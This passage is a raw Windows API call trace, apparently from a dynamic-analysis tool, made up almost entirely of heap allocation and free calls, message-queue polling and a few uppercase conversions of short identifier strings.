[0188.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0188.686] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0188.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0188.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.686] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0188.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.687] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0188.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0188.687] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0188.687] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0188.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.689] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.689] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0188.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0188.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0188.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0188.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0188.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0188.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0188.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0188.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.690] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0188.690] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0188.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0188.691] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0188.691] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0188.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0188.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16f8 [0188.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0188.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0188.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0188.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c98 [0188.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0188.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0188.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0188.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0188.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0188.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0188.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0188.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0188.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0188.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0188.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa580 [0188.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0188.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0188.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0188.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0188.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0188.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0188.693] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0188.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0188.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0188.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0188.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.694] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0188.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0188.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0188.694] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.694] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0188.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0188.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0188.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0188.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0188.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0188.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0188.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0188.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.695] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0188.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0188.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0188.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0188.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0188.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0188.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0188.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.696] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0188.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0188.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0188.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0188.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0188.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0188.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0188.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0188.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.697] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0188.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0188.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0188.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0188.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0188.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0188.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0188.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0188.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0188.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0188.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0188.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.698] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.698] RtlAllocateHeap 